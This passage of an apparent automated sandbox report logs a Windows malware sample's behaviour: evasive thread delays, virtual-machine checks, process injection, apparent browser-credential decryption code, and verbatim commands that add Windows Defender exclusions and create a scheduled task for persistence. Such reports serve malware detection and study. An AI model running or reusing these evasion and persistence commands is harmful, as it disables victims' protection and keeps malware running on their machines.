Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 597391	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 594563	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Thread delayed: delay time: 594452	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 599343
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 599234
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 599125
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 599015
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 598906
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 598797
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 598687
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 598578
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 598469
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 598359
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 598246
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 598140
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 598031
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 597921
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 597812
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 597702
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 597593
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 597484
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 597375
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 597266
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 597141
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 597031
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 596922
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 596812
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 596703
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 596594
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 596484
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 596374
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 596265
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 596155
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 596046
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 595937
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 595828
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 595719
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 595609
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 595498
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 595389
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 595281
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 595172
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 595062
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 594953
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 594844
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 594734
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Thread delayed: delay time: 594625

Source: PvAmrCZENy.exe, 00000007.00000002.2129290212.0000000000955000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP
Source: svchost.exe, 0000000D.00000002.2131053195.0000022AE622B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2132878715.0000022AEB85B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: yxXYABHh.exe, 0000000C.00000002.2129109732.0000000000EE6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\PvAmrCZENy.exe

Code function: 7_2_06409548 LdrInitializeThunk,LdrInitializeThunk,

7_2_06409548

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\PvAmrCZENy.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, COVID19.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PvAmrCZENy.exe"
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\yxXYABHh.exe"
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PvAmrCZENy.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\yxXYABHh.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe

Memory written: C:\Users\user\AppData\Roaming\yxXYABHh.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PvAmrCZENy.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\yxXYABHh.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process created: C:\Users\user\Desktop\PvAmrCZENy.exe "C:\Users\user\Desktop\PvAmrCZENy.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp5E89.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process created: C:\Users\user\AppData\Roaming\yxXYABHh.exe "C:\Users\user\AppData\Roaming\yxXYABHh.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Queries volume information: C:\Users\user\Desktop\PvAmrCZENy.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Queries volume information: C:\Users\user\Desktop\PvAmrCZENy.exe VolumeInformation	Jump to behavior
